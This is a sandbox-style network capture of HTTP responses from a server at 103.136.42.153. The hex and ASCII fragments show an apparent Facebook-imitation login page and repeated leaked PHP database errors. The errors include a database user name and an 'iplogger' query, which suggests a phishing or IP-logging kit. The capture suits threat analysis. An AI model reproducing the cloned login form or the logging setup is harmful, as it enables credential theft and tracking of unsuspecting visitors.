2022-10-07 14:00:15 UTC	1189	IN	Data Raw: 74 6c 65 3d 22 47 6f 20 74 6f 20 46 61 63 65 62 6f 6f 6b 20 68 6f 6d 65 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 62 5f 6c 6f 67 6f 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 39 31 36 37 64 36 22 3e 3c 75 3e 46 61 63 65 62 6f 6f 6b 3c 2f 75 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 79 6c 34 20 72 66 6c 6f 61 74 20 5f 6f 68 66 22 20 64 61 74 61 2d 74 65 73 74 69 64 3d 22 72 6f 79 61 6c 5f 6c 6f 67 69 6e 5f 66 6f 72 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 22 20 69 64 3d 22 75 5f 30 5f 30 5f 67 37 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 77 68 69 74 65 22 3e 4a 6f 69 6e 20 6f 72 20 4c 6f 67 20 49 6e 74 6f 20 46 61 63 65 62 6f 6f 6b 20 e2 80 89 20 3c 69 20 Data Ascii: tle="Go to Facebook home"><i class="fb_logo img sp_ot1t5YjYL3s sx_9167d6"><u>Facebook</u></i></a></h1></div><div class="_yl4 rfloat _ohf" data-testid="royal_login_form"><a href="/" id="u_0_0_g7"><span style="color: white">Join or Log Into Facebook <i
2022-10-07 14:00:15 UTC	1190	IN	Data Raw: 22 6f 66 66 22 20 6e 61 6d 65 3d 22 74 69 6d 65 7a 6f 6e 65 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 33 5f 76 4c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 6e 61 6d 65 3d 22 6c 67 6e 64 69 6d 22 20 76 61 6c 75 65 3d 22 22 20 69 64 3d 22 75 5f 30 5f 34 5f 42 66 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6c 67 6e 72 6e 64 22 20 76 61 6c 75 65 3d 22 30 37 30 30 31 35 5f 76 52 32 67 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 6c 67 6e 6a 73 22 20 6e 61 6d 65 3d 22 6c 67 6e 6a 73 22 20 76 61 6c 75 65 3d 22 6e 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 Data Ascii: "off" name="timezone" value="" id="u_0_3_vL" /><input type="hidden" autocomplete="off" name="lgndim" value="" id="u_0_4_Bf" /><input type="hidden" name="lgnrnd" value="070015_vR2g" /><input type="hidden" id="lgnjs" name="lgnjs" value="n" /><input type="hi
2022-10-07 14:00:15 UTC	1192	IN	Data Raw: 3d 22 6d 61 69 6e 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 76 6c 20 5f 34 2d 64 6f 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 5f 34 2d 64 70 22 3e 54 68 69 73 20 70 61 67 65 20 69 73 6e 26 23 30 33 39 3b 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 3c 68 33 20 63 6c 61 73 73 3d 22 5f 34 2d 64 71 22 3e 54 68 65 20 6c 69 6e 6b 20 79 6f 75 20 66 6f 6c 6c 6f 77 65 64 20 6d 61 79 20 62 65 20 62 72 6f 6b 65 6e 2c 20 6f 72 20 74 68 65 20 70 61 67 65 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2e 3c 2f 68 33 3e 3c 69 20 63 6c 61 73 73 3d 22 6d 76 6c 20 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 37 37 38 38 63 30 22 3e 3c 2f 69 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 62 6c 20 70 76 6c 20 5f 34 2d 64 72 20 66 73 6d Data Ascii: ="main"><div class="pvl _4-do"><h2 class="_4-dp">This page isn't available</h2><h3 class="_4-dq">The link you followed may be broken, or the page may have been removed.</h3><i class="mvl img sp_ot1t5YjYL3s sx_7788c0"></i><div class="mbl pvl _4-dr fsm
2022-10-07 14:00:15 UTC	1193	IN	Data Raw: 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 Data Ascii: 3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost
2022-10-07 14:00:15 UTC	1195	IN	Data Raw: 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 30 30 32 35 32 30 69 6e 73 74 65 61 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 Data Ascii: moved\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u002520instead\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u0
2022-10-07 14:00:15 UTC	1196	IN	Data Raw: 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 72 5c 75 30 30 32 35 32 30 66 72 6f 6d 5c 75 30 30 32 35 32 30 74 5f 63 68 61 6e 6e 65 6c 73 5c 75 30 30 32 35 32 30 77 68 65 72 65 5c 75 30 30 32 35 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 Data Ascii: 520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogger\u002520from\u002520t_channels\u002520where\u002520name='38b2c7a1af454d382927f81543d86055886bc02863457'\u002520limit\u0025200,1\u00253Cbr\u00253E\u00250A\u
2022-10-07 14:00:15 UTC	1198	IN	Data Raw: 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 Data Ascii: 136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%
2022-10-07 14:00:15 UTC	1199	IN	Data Raw: 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 Data Ascii: sword:\u002520YES)\u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u002
2022-10-07 14:00:15 UTC	1201	IN	Data Raw: 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 31 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 46 72 65 6e 63 68 20 28 46 72 61 6e 63 65 29 22 3e 46 72 61 6e c3 a7 61 69 73 20 28 46 72 61 6e 63 65 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 44 65 70 72 65 63 61 74 65 64 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 Data Ascii: t;www_list_selector", 1); return false;" title="French (France)">Franais (France)</a></li><li><a class="_sv4" dir="ltr" href="https://it-it.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is
2022-10-07 14:00:15 UTC	1202	IN	Data Raw: 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 69 74 5f 49 54 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 69 74 2d 69 74 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c Data Ascii: ont%3E" onclick="require("IntlUtils").setCookieLocale("it_IT", "en_US", "https:\/\/it-it.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\
2022-10-07 14:00:15 UTC	1204	IN	Data Raw: 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 30 30 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 Data Ascii: abase.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523000000\u002522\u00253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Acces
2022-10-07 14:00:15 UTC	1205	IN	Data Raw: 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 34 37 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 Data Ascii: ser%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%
2022-10-07 14:00:15 UTC	1206	IN	Data Raw: 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 Data Ascii: 3C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520Access\u0
2022-10-07 14:00:15 UTC	1208	IN	Data Raw: 32 30 6c 69 6d 69 74 5c 75 30 30 32 35 32 30 30 2c 31 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 32 33 66 66 30 30 30 30 5c 75 30 30 32 35 32 32 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 35 42 54 45 50 5c 75 30 30 32 35 32 30 53 54 4f 50 5c 75 30 30 32 35 35 44 5c 75 30 30 32 35 33 43 5c 2f 66 6f 6e 74 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 5c 2f 73 6d 61 6c 6c 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 Data Ascii: 20limit\u0025200,1\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253E\u00250A\u00253Csmall\u00253E\u00250A\u00253Cfont\u002520color=\u002522\u002523ff0000\u002522\u00253E\u00255BTEP\u002520STOP\u00255D\u00253C\/font\u00253E\u00250A\u00253C\/small\u00253E\u00250A
2022-10-07 14:00:15 UTC	1209	IN	Data Raw: 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 32 30 66 72 6f 6d 25 32 30 74 5f 63 68 61 6e 6e 65 6c 73 25 32 30 77 68 65 72 65 25 32 30 6e 61 6d 65 3d 26 23 30 33 39 3b 33 38 62 32 63 37 61 31 61 66 34 35 34 64 33 38 32 39 32 37 66 38 31 35 34 33 64 38 36 30 35 35 38 38 36 62 63 30 32 38 36 33 34 35 37 26 23 30 33 39 3b 25 32 30 6c 69 6d 69 74 25 32 30 30 2c 31 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 73 6d 61 6c 6c 25 Data Ascii: user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%
2022-10-07 14:00:15 UTC	1211	IN	Data Raw: 30 32 35 33 45 34 37 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 57 61 72 6e 69 6e 67 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 5c 75 30 30 32 35 32 30 65 78 70 65 63 74 73 5c 75 30 30 32 35 32 30 70 61 72 61 6d 65 74 65 72 5c 75 30 30 32 35 32 30 32 5c 75 30 30 32 35 32 30 74 6f 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 73 6f 75 72 63 Data Ascii: 0253E47\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EWarning\u00253C\/b\u00253E:\u002520\u002520mysql_query()\u002520expects\u002520parameter\u0025202\u002520to\u002520be\u002520resourc
2022-10-07 14:00:15 UTC	1212	IN	Data Raw: 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 25 32 30 54 68 65 25 32 30 6d 79 73 71 6c 25 32 30 65 78 74 65 6e 73 69 6f 6e 25 32 30 69 73 25 32 30 64 65 70 72 65 63 61 74 65 64 25 32 30 61 6e 64 25 32 30 77 69 6c 6c 25 32 30 62 65 25 32 30 72 65 6d 6f 76 65 64 25 32 30 69 6e 25 32 30 74 68 65 25 32 30 66 75 74 75 72 65 3a 25 32 30 75 73 65 25 32 30 6d 79 73 71 6c 69 25 32 30 6f 72 25 32 30 50 44 4f 25 32 30 69 6e 73 74 65 61 64 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 Data Ascii: :%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb
2022-10-07 14:00:15 UTC	1214	IN	Data Raw: 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 32 35 32 30 77 69 6c 6c 5c 75 30 30 32 35 32 30 62 65 5c 75 30 30 32 35 32 30 72 65 6d 6f 76 65 64 5c 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 74 68 65 5c 75 30 30 32 35 32 30 66 75 74 75 72 65 3a 5c 75 30 30 32 35 32 30 75 73 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 69 5c 75 30 30 32 35 32 30 6f 72 5c 75 30 30 32 35 32 30 50 44 4f 5c 75 Data Ascii: d\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u002520will\u002520be\u002520removed\u002520in\u002520the\u002520future:\u002520use\u002520mysqli\u002520or\u002520PDO\u
2022-10-07 14:00:15 UTC	1215	IN	Data Raw: 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 31 30 34 35 5c 75 30 30 32 35 32 30 2d 5c 75 30 30 32 35 32 30 41 63 63 65 73 73 5c 75 30 30 32 35 32 30 64 65 6e 69 65 64 5c 75 30 30 32 35 32 30 66 6f 72 5c 75 30 30 32 35 32 30 75 73 65 72 5c 75 30 30 32 35 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 5c 75 30 30 34 30 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 5c 75 30 30 32 35 32 30 28 75 73 69 6e 67 5c 75 30 30 32 35 32 30 70 61 73 73 77 6f 72 64 3a 5c 75 30 30 32 35 32 30 59 45 53 29 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 33 45 73 65 6c 65 63 74 5c 75 30 30 32 35 32 30 69 70 6c 6f 67 67 65 Data Ascii: 253E\u00250A\u00253Cb\u00253E1045\u002520-\u002520Access\u002520denied\u002520for\u002520user\u002520'dbnew01'\u0040'localhost'\u002520(using\u002520password:\u002520YES)\u00253Cbr\u00253E\u00250A\u00253Cbr\u00253Eselect\u002520iplogge
2022-10-07 14:00:15 UTC	1217	IN	Data Raw: 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 62 25 33 45 57 61 72 6e 69 6e 67 25 33 43 2f 62 25 33 45 3a 25 32 30 25 32 30 6d 79 73 71 6c 5f 71 75 65 72 79 28 29 25 32 30 65 78 70 65 63 74 73 25 32 30 70 61 72 61 6d 65 74 65 72 25 32 30 32 25 32 30 74 6f 25 32 30 62 65 25 32 30 72 65 73 6f 75 72 63 65 2c 25 32 30 62 6f 6f 6c 65 61 6e 25 32 30 67 69 76 65 6e 25 32 30 69 6e 25 32 30 25 33 43 62 25 33 45 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 2f 73 65 65 6d 6f 72 65 62 74 79 2f 69 6e 63 6c 75 64 65 73 2f 64 61 74 61 62 61 73 65 2e 70 68 70 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 Data Ascii: Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%
